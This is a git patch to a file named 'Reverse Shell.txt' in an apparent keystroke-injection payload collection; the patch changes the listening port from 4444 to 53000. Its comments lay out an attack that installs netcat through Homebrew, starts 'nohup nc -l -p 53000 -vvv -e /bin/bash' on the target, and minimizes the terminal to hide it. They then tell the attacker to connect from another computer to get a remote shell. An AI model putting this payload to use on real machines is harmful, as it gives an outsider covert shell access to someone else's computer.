From 207a325da584c8f6ea23fafc4849712560f6afa6 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Mon, 29 May 2023 20:48:56 -0500 Subject: [PATCH] edits on Port number and added & to end of string --- RECON/Reverse Shell.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/RECON/Reverse Shell.txt b/RECON/Reverse Shell.txt index 0158a11..38ed8f7 100644 --- a/RECON/Reverse Shell.txt +++ b/RECON/Reverse Shell.txt @@ -1,11 +1,11 @@ REM installs netcat using home-brew (can adjust delay) -REM Runs the command nohup nc -l -p 4444 -vvv -e /bin/bash to start a netcat listener on port 53000 +REM Runs the command nohup nc -l -p 53000 -vvv -e /bin/bash to start a netcat listener on port 53000 REM clears the terminal REM Gui m minimizes the terminal window -REM Now on your separate computer in your terminal Run the command 'nc 4444' +REM Now on your separate computer in your terminal Run the command 'nc 53000' REM replacing '' with the IP address of the target computer. REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! REM If the connection is successful, you should now have a remote shell session on the remote computer.